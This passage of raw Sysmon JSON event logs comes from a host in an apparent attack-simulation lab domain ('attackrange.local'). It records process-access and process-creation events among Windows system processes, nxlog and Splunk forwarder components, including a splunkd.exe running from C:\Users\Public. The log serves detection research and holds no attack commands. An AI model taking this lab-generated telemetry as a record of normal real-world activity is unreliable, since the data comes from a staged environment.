06:57:00.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-123C-5F25-0000-0010863D0900}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-123C-5F25-0000-0010863D0900}","TargetProcessId":"4992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.636\r\nSourceProcessGUID: {E2A3D6B1-123C-5F25-0000-0010863D0900}\r\nSourceProcessId: 4992\r\nSourceThreadId: 4556\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.636","SourceProcessGUID":"{E2A3D6B1-123C-5F25-0000-0010863D0900}","SourceProcessId":"4992","SourceThreadId":"4556","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.965\r\nProcessGuid: {E2A3D6B1-123D-5F25-0000-001001400900}\r\nProcessId: 4908\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.965","ProcessGuid":"{E2A3D6B1-123D-5F25-0000-001001400900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-123D-5F25-0000-001001400900}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-123D-5F25-0000-001001400900}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-123D-5F25-0000-001001400900}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-123D-5F25-0000-001001400900}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 